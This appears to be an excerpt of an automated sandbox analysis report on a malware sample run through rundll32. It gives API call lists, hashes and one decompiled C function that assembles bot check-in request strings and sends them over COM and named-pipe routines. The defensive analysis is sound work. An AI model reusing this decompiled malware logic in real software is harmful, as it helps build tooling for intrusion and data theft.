                                                          Function 06287AEF Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000000,?,?), ref: 06287B51
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 06287BED
                                                          • lstrcpyn.KERNEL32(00000000,?,?), ref: 06287C02
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 06287C1D
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,?,?,?), ref: 06287D04
                                                          • StrChrA.SHLWAPI(00000001,00000020), ref: 06287D15
                                                          • lstrlen.KERNEL32(00000000), ref: 06287D29
                                                          • memmove.NTDLL(?,?,00000001), ref: 06287D39
                                                          • lstrlen.KERNEL32(?,00000000,?,?,?), ref: 06287D65
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06287D8B
                                                          • memcpy.NTDLL(00000000,?,?), ref: 06287D9F
                                                          • memcpy.NTDLL(?,?,?), ref: 06287DBF
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06287DFB
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 06287EC1
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,00000001), ref: 06287F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
                                                          • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                                          • API String ID: 3227826163-647159250
                                                          • Opcode ID: 02d45709c516fc910895558f7c40ebec2a2650164d5ec53e3203335b73c69601
                                                          • Instruction ID: 1e20e12c2168a3ca38898f3500c3a9356ee71f3bc3af499c405c55e0c7aacf31
                                                          • Opcode Fuzzy Hash: 02d45709c516fc910895558f7c40ebec2a2650164d5ec53e3203335b73c69601
                                                          • Instruction Fuzzy Hash: C2E14C31A21206EFDB55EFA8DC88BAE7BB5FF44300F248558ED15AB291D730E950DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627E627 Relevance: 36.3, APIs: 24, Instructions: 288memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL ref: 0627E65B
                                                          • wsprintfA.USER32 ref: 0627E6C5
                                                          • wsprintfA.USER32 ref: 0627E70B
                                                          • wsprintfA.USER32 ref: 0627E72C
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E763
                                                          • wsprintfA.USER32 ref: 0627E784
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E79E
                                                          • wsprintfA.USER32 ref: 0627E7C5
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0627E7DA
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0627E7F4
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0627E815
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0627E82F
                                                            • Part of subcall function 0628EA15: lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 0628EA40
                                                            • Part of subcall function 0628EA15: lstrlen.KERNEL32(?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA48
                                                            • Part of subcall function 0628EA15: strcpy.NTDLL ref: 0628EA5F
                                                            • Part of subcall function 0628EA15: lstrcat.KERNEL32(00000000,?), ref: 0628EA6A
                                                            • Part of subcall function 0628EA15: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA87
                                                          • StrTrimA.SHLWAPI(00000000,062953E8,00000000,0689C310), ref: 0627E864
                                                            • Part of subcall function 06278DC7: lstrlen.KERNEL32(06898560,76C85520,76CC81D0,773BEEF0,0627E873,?), ref: 06278DD7
                                                            • Part of subcall function 06278DC7: lstrlen.KERNEL32(?), ref: 06278DDF
                                                            • Part of subcall function 06278DC7: lstrcpy.KERNEL32(00000000,06898560), ref: 06278DF3
                                                            • Part of subcall function 06278DC7: lstrcat.KERNEL32(00000000,?), ref: 06278DFE
                                                          • lstrcpy.KERNEL32(?,?), ref: 0627E88D
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0627E897
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E8A2
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0627E8A9
                                                          • RtlEnterCriticalSection.NTDLL(0689C2D0), ref: 0627E8B4
                                                          • RtlLeaveCriticalSection.NTDLL(0689C2D0), ref: 0627E8D0
                                                            • Part of subcall function 06277DF5: memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,06285583,00000000,00000000), ref: 06277E46
                                                            • Part of subcall function 06277DF5: memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 06277ED9
                                                          • HeapFree.KERNEL32(00000000,?,00000001,0689C310,?,?,?), ref: 0627E997
                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 0627E9AF
                                                          • HeapFree.KERNEL32(00000000,?,00000000,0689C310), ref: 0627E9BD
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E9CB
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0627E9D6
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$lstrcatwsprintf$CriticalSectionlstrlen$lstrcpy$AllocateEnterLeaveTrimmemcpy$strcpy
                                                          • String ID:
                                                          • API String ID: 4032678529-0
                                                          • Opcode ID: 1f77de2821ac148abf04d8da955da1db11ac094f03bdcf90e85843665525a256
                                                          • Instruction ID: d5297447f01a4369e69d37d42db57dd164399ea6243bb4f2489e15ce3503ed25
                                                          • Opcode Fuzzy Hash: 1f77de2821ac148abf04d8da955da1db11ac094f03bdcf90e85843665525a256
                                                          • Instruction Fuzzy Hash: BDB17771A14302EFDB819F69EC88E5A7BEABFC8214F054418FA59DB260D735E814CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 036D300E Relevance: 36.3, APIs: 24, Instructions: 266memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 75%
                                                          			E036D300E(long __eax, intOrPtr _a4, void* _a8, void* _a16, void* _a20, void* _a24, intOrPtr _a32, void* _a40, intOrPtr _a44) {
				intOrPtr _v4;
				signed int _v8;
				int* _v12;
				char* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				long _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t74;
				intOrPtr _t75;
				int _t78;
				intOrPtr _t79;
				int _t82;
				intOrPtr _t83;
				intOrPtr _t84;
				void* _t86;
				void* _t89;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr* _t99;
				int* _t105;
				int* _t115;
				char** _t117;
				char* _t118;
				intOrPtr* _t123;
				intOrPtr* _t125;
				intOrPtr* _t127;
				intOrPtr* _t129;
				intOrPtr _t132;
				intOrPtr _t136;
				int _t139;
				intOrPtr _t141;
				int _t144;
				void* _t145;
				intOrPtr _t159;
				void* _t161;
				int _t162;
				void* _t163;
				void* _t164;
				long _t165;
				intOrPtr* _t166;
				intOrPtr* _t167;
				intOrPtr _t168;
				intOrPtr* _t171;
				char** _t174;
				char** _t176;
				char** _t177;
				void* _t182;

				_t66 = __eax;
				_t174 =  &_v16;
				_t145 = _a20;
				_a20 = 8;
				if(__eax == 0) {
					_t66 = GetTickCount();
				}
				_t67 =  *0x36da018; // 0x3df0b315
				asm("bswap eax");
				_t68 =  *0x36da014; // 0x3a87c8cd
				asm("bswap eax");
				_t69 =  *0x36da010; // 0xd8d2f808
				asm("bswap eax");
				_t70 =  *0x36da00c; // 0x81762942
				asm("bswap eax");
				_t71 =  *0x36da348; // 0x228d5a8
				_t3 = _t71 + 0x36db62b; // 0x74666f73
				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x36da02c,  *0x36da004, _t66);
				_t74 = E036D6927();
				_t75 =  *0x36da348; // 0x228d5a8
				_t4 = _t75 + 0x36db66b; // 0x74707526
				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
				_t176 =  &(_t174[0xe]);
				_t163 = _t162 + _t78;
				if(_a24 != 0) {
					_t141 =  *0x36da348; // 0x228d5a8
					_t8 = _t141 + 0x36db676; // 0x732526
					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
					_t176 =  &(_t176[3]);
					_t163 = _t163 + _t144;
				}
				_t79 =  *0x36da348; // 0x228d5a8
				_t10 = _t79 + 0x36db78e; // 0x5968d36
				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x36db2de; // 0x74636126
				_t157 = 0 | _t182 == 0x00000000;
				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
				_t177 =  &(_t176[3]);
				_t164 = _t163 + _t82;
				_t83 = E036D22D7(_t10);
				_a32 = _t83;
				if(_t83 != 0) {
					_t136 =  *0x36da348; // 0x228d5a8
					_t17 = _t136 + 0x36db8d0; // 0x736e6426
					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
					_t177 =  &(_t177[3]);
					_t164 = _t164 + _t139;
					HeapFree( *0x36da2d8, 0, _a40);
				}
				_t84 = E036D2A11();
				_a32 = _t84;
				if(_t84 != 0) {
					_t132 =  *0x36da348; // 0x228d5a8
					_t21 = _t132 + 0x36db8d8; // 0x6f687726
					wsprintfA(_t164 + _t145, _t21, _t84);
					_t177 =  &(_t177[3]);
					HeapFree( *0x36da2d8, 0, _a40);
				}
				_t159 =  *0x36da3cc; // 0x59695b0
				_t86 = E036D2509(0x36da00a, _t159 + 4);
				_t165 = 0;
				_a16 = _t86;
				if(_t86 == 0) {
					L28:
					HeapFree( *0x36da2d8, _t165, _t145);
					return _a44;
				} else {
					_t89 = RtlAllocateHeap( *0x36da2d8, 0, 0x800);
					_a24 = _t89;
					if(_t89 == 0) {
						L27:
						HeapFree( *0x36da2d8, _t165, _a8);
						goto L28;
					}
					E036D1BE9(GetTickCount());
					_t93 =  *0x36da3cc; // 0x59695b0
					__imp__(_t93 + 0x40);
					asm("lock xadd [eax], ecx");
					_t97 =  *0x36da3cc; // 0x59695b0
					__imp__(_t97 + 0x40);
					_t99 =  *0x36da3cc; // 0x59695b0
					_t161 = E036D1D33(1, _t157, _t145,  *_t99);
					asm("lock xadd [eax], ecx");
					if(_t161 == 0) {
						L26:
						HeapFree( *0x36da2d8, _t165, _a16);
						goto L27;
					}
					StrTrimA(_t161, 0x36d928c);
					_push(_t161);
					_t105 = E036D393C();
					_v12 = _t105;
					if(_t105 == 0) {
						L25:
						HeapFree( *0x36da2d8, _t165, _t161);
						goto L26;
					}
					_t166 = __imp__;
					 *_t166(_t161, _a8);
					 *_t166(_a4, _v12);
					_t167 = __imp__;
					 *_t167(_v4, _v24);
					_t168 = E036D61FC( *_t167(_v12, _t161), _v20);
					_v36 = _t168;
					if(_t168 == 0) {
						_v8 = 8;
						L23:
						E036D561E();
						L24:
						HeapFree( *0x36da2d8, 0, _v40);
						_t165 = 0;
						goto L25;
					}
					_t115 = E036D10B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
					_v12 = _t115;
					if(_t115 == 0) {
						_t171 = _v24;
						_v20 = E036D5B9D(_t171, _t168, _v16, _v12);
						_t123 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
						_t125 =  *((intOrPtr*)(_t171 + 8));
						 *((intOrPtr*)( *_t125 + 8))(_t125);
						_t127 =  *((intOrPtr*)(_t171 + 4));
						 *((intOrPtr*)( *_t127 + 8))(_t127);
						_t129 =  *_t171;
						 *((intOrPtr*)( *_t129 + 8))(_t129);
						E036D6C2C(_t171);
					}
					if(_v8 != 0x10d2) {
						L18:
						if(_v8 == 0) {
							_t117 = _v16;
							if(_t117 != 0) {
								_t118 =  *_t117;
								_t169 =  *_v12;
								_v16 = _t118;
								wcstombs(_t118, _t118,  *_v12);
								 *_v24 = E036D3C22(_v16, _v16, _t169 >> 1);
							}
						}
						goto L21;
					} else {
						if(_v16 != 0) {
							L21:
							E036D6C2C(_v32);
							if(_v12 == 0 || _v8 == 0x10d2) {
								goto L24;
							} else {
								goto L23;
							}
						}
						_v8 = _v8 & 0x00000000;
						goto L18;
					}
				}
			}




























































                                                          0x036d300e
                                                          0x036d300e
                                                          0x036d3012
                                                          0x036d3019
                                                          0x036d3023
                                                          0x036d3025
                                                          0x036d3025
                                                          0x036d3032
                                                          0x036d303d
                                                          0x036d3040
                                                          0x036d304b
                                                          0x036d304e
                                                          0x036d3053
                                                          0x036d3056
                                                          0x036d305b
                                                          0x036d305e
                                                          0x036d306a
                                                          0x036d3077
                                                          0x036d3079
                                                          0x036d307f
                                                          0x036d3084
                                                          0x036d308f
                                                          0x036d3091
                                                          0x036d3094
                                                          0x036d309b
                                                          0x036d309d
                                                          0x036d30a6
                                                          0x036d30b1
                                                          0x036d30b3
                                                          0x036d30b6
                                                          0x036d30b6
                                                          0x036d30b8
                                                          0x036d30bd
                                                          0x036d30c5
                                                          0x036d30c9
                                                          0x036d30cf
                                                          0x036d30d8
                                                          0x036d30da
                                                          0x036d30dd
                                                          0x036d30df
                                                          0x036d30ea
                                                          0x036d30f0
                                                          0x036d30f3
                                                          0x036d30f8
                                                          0x036d3103
                                                          0x036d3105
                                                          0x036d310c
                                                          0x036d3116
                                                          0x036d3116
                                                          0x036d3118
                                                          0x036d311d
                                                          0x036d3123
                                                          0x036d3126
                                                          0x036d312b
                                                          0x036d3135
                                                          0x036d3137
                                                          0x036d3146
                                                          0x036d3146
                                                          0x036d3148
                                                          0x036d3156
                                                          0x036d315b
                                                          0x036d315d
                                                          0x036d3163
                                                          0x036d3343
                                                          0x036d334b
                                                          0x036d3358
                                                          0x036d3169
                                                          0x036d3175
                                                          0x036d317b
                                                          0x036d3181
                                                          0x036d3336
                                                          0x036d3341
                                                          0x00000000
                                                          0x036d3341
                                                          0x036d318d
                                                          0x036d3192
                                                          0x036d319b
                                                          0x036d31ac
                                                          0x036d31b0
                                                          0x036d31b9
                                                          0x036d31bf
                                                          0x036d31cc
                                                          0x036d31d9
                                                          0x036d31df
                                                          0x036d3329
                                                          0x036d3334
                                                          0x00000000
                                                          0x036d3334
                                                          0x036d31eb
                                                          0x036d31f1
                                                          0x036d31f2
                                                          0x036d31f7
                                                          0x036d31fd
                                                          0x036d331f
                                                          0x036d3327
                                                          0x00000000
                                                          0x036d3327
                                                          0x036d3207
                                                          0x036d320e
                                                          0x036d3218
                                                          0x036d321e
                                                          0x036d3228
                                                          0x036d323a
                                                          0x036d323c
                                                          0x036d3242
                                                          0x036d335b
                                                          0x036d330a
                                                          0x036d330a
                                                          0x036d330f
                                                          0x036d331b
                                                          0x036d331d
                                                          0x00000000
                                                          0x036d331d
                                                          0x036d324d
                                                          0x036d3252
                                                          0x036d3258
                                                          0x036d3263
                                                          0x036d326e
                                                          0x036d3272
                                                          0x036d3278
                                                          0x036d327e
                                                          0x036d3284
                                                          0x036d3287
                                                          0x036d328d
                                                          0x036d3290
                                                          0x036d3295
                                                          0x036d3299
                                                          0x036d3299
                                                          0x036d32a6
                                                          0x036d32b4
                                                          0x036d32b9
                                                          0x036d32bb
                                                          0x036d32c1
                                                          0x036d32c7
                                                          0x036d32c9
                                                          0x036d32ce
                                                          0x036d32d2
                                                          0x036d32ee
                                                          0x036d32ee
                                                          0x036d32c1
                                                          0x00000000
                                                          0x036d32a8
                                                          0x036d32ad
                                                          0x036d32f0
                                                          0x036d32f4
                                                          0x036d32fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d32fe
                                                          0x036d32af
                                                          0x00000000
                                                          0x036d32af
                                                          0x036d32a6

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 036D3025
                                                          • wsprintfA.USER32 ref: 036D3072
                                                          • wsprintfA.USER32 ref: 036D308F
                                                          • wsprintfA.USER32 ref: 036D30B1
                                                          • wsprintfA.USER32 ref: 036D30D8
                                                          • wsprintfA.USER32 ref: 036D3103
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3116
                                                          • wsprintfA.USER32 ref: 036D3135
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3146
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D3175
                                                          • GetTickCount.KERNEL32 ref: 036D3187
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D319B
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D31B9
                                                            • Part of subcall function 036D1D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D5E
                                                            • Part of subcall function 036D1D33: lstrlen.KERNEL32(00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D66
                                                            • Part of subcall function 036D1D33: strcpy.NTDLL ref: 036D1D7D
                                                            • Part of subcall function 036D1D33: lstrcat.KERNEL32(00000000,00000000), ref: 036D1D88
                                                            • Part of subcall function 036D1D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1DA5
                                                          • StrTrimA.SHLWAPI(00000000,036D928C,?,059695B0), ref: 036D31EB
                                                            • Part of subcall function 036D393C: lstrlen.KERNEL32(05969B68,00000000,00000000,00000000,036D5902,00000000), ref: 036D394C
                                                            • Part of subcall function 036D393C: lstrlen.KERNEL32(?), ref: 036D3954
                                                            • Part of subcall function 036D393C: lstrcpy.KERNEL32(00000000,05969B68), ref: 036D3968
                                                            • Part of subcall function 036D393C: lstrcat.KERNEL32(00000000,?), ref: 036D3973
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D320E
                                                          • lstrcpy.KERNEL32(?,?), ref: 036D3218
                                                          • lstrcat.KERNEL32(?,?), ref: 036D3228
                                                          • lstrcat.KERNEL32(?,00000000), ref: 036D322F
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                          • wcstombs.NTDLL ref: 036D32D2
                                                            • Part of subcall function 036D5B9D: SysAllocString.OLEAUT32(?), ref: 036D5BD8
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D331B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 036D3327
                                                          • HeapFree.KERNEL32(00000000,?,?,059695B0), ref: 036D3334
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3341
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D334B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 967369141-0
                                                          • Opcode ID: d8c1cb5ddb61ace1df39049e49f52818066488247e4b52994d7867d18709bc5e
                                                          • Instruction ID: 544b9c445089f4d4db39989e49b2ca8a95d54313d154d01ce6d9541e1ab3177f
                                                          • Opcode Fuzzy Hash: d8c1cb5ddb61ace1df39049e49f52818066488247e4b52994d7867d18709bc5e
                                                          • Instruction Fuzzy Hash: 37A1AD75D06300AFC711EFA5ED48E5A7BE8EF88714F191918F848D7228CB32D865CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628CEB7 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 0628CED3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CEEF
                                                          • GetLastError.KERNEL32 ref: 0628CF3E
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628CF54
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CF68
                                                          • GetLastError.KERNEL32 ref: 0628CF82
                                                          • GetLastError.KERNEL32 ref: 0628CFB5
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628CFD3
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 0628CFFF
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628D014
                                                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0628D0E8
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628D0F7
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628D10C
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628D11F
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628D131
                                                          • RtlExitUserThread.NTDLL(?,?), ref: 0628D146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3853681310-3916222277
                                                          • Opcode ID: c42ecb42fe1e352d7a2b647c8315867c4794d24e93178c47a5a5a9b47da872de
                                                          • Instruction ID: a8e280dd71e6d5d31be38928036a0180f63a71b1a1f33d7a44839b7fa5bd3ca7
                                                          • Opcode Fuzzy Hash: c42ecb42fe1e352d7a2b647c8315867c4794d24e93178c47a5a5a9b47da872de
                                                          • Instruction Fuzzy Hash: 27815E71A1130AAFDB11AFA4EC88EAE7BB9EF89304F04441AFA05E7290D7345945DF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06287F79 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 131memoryregistrythreadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06287F9B
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 06287FB8
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 06288008
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 06288012
                                                          • GetLastError.KERNEL32 ref: 0628801C
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628802D
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0628804F
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06288086
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0628809A
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 062880A3
                                                          • SuspendThread.KERNEL32(?), ref: 062880B2
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000), ref: 062880C6
                                                          • SetEvent.KERNEL32(00000000), ref: 062880D3
                                                          • CloseHandle.KERNEL32(00000000), ref: 062880DA
                                                          • Sleep.KERNEL32(000001F4), ref: 062880ED
                                                          • ResumeThread.KERNEL32(?), ref: 06288111
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                          • String ID: v
                                                          • API String ID: 1011176505-1801730948
                                                          • Opcode ID: e6ade0d62cae29b262dcc6102884740d81d533ee42705cab10a9e1faa87c835a
                                                          • Instruction ID: 45f1391b070429eaeef75f5a42ade41f28c0fc266976e7ad1d20b06e44ad9274
                                                          • Opcode Fuzzy Hash: e6ade0d62cae29b262dcc6102884740d81d533ee42705cab10a9e1faa87c835a
                                                          • Instruction Fuzzy Hash: 2D41817291230AEFCB51AFA4FC8C9AD7BBAFB88344B144029FB05E2150D7355994DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06272C62 Relevance: 27.3, APIs: 18, Instructions: 275memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 06272CA9
                                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 06272CC7
                                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 06272CF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 06272D62
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272DDA
                                                          • wsprintfA.USER32 ref: 06272DF6
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272E01
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272E18
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272EA4
                                                          • wsprintfA.USER32 ref: 06272EBF
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272ECA
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272EE1
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 06272F03
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272F1E
                                                          • wsprintfA.USER32 ref: 06272F35
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272F40
                                                            • Part of subcall function 06273172: lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                            • Part of subcall function 06273172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                            • Part of subcall function 06273172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                            • Part of subcall function 06273172: GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                            • Part of subcall function 06273172: HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272F57
                                                          • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06898A20), ref: 06272F83
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                                          • String ID:
                                                          • API String ID: 3130754786-0
                                                          • Opcode ID: f12098edaa4d1412e04b88ef8589fa0e983bd04dadc9bf5a65ae40c7047656a6
                                                          • Instruction ID: 045360fc81878d09226498a9763af5e14a9b7ed0ddcfae95afa291874e39bed3
                                                          • Opcode Fuzzy Hash: f12098edaa4d1412e04b88ef8589fa0e983bd04dadc9bf5a65ae40c7047656a6
